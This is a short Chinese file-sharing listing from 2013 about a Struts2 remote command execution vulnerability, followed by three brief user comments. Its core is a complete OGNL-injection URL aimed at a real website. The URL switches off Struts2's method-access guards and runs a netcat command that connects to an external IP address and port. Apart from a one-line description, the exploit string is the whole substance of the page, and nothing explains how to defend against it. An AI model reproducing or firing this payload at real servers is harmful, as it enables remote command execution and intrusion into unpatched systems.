Apache的Struts2框架严重安全漏洞

时间:2013-08-09 05:31:26
【文件属性】:

文件名称:Apache的Struts2框架严重安全漏洞

文件大小:14KB

文件格式:DOCX

更新时间:2013-08-09 05:31:26

Apache Struts2 框架 安全漏洞

Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%2067.205.52.169%208888%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1


网友评论

  • 已经过时了,现在有更多其他的包,反正struts2 就不安全。
  • 这个漏洞很多人都知道了,都不上了
  • 最近struts2的漏洞很猖狂,得赶紧把漏洞修补上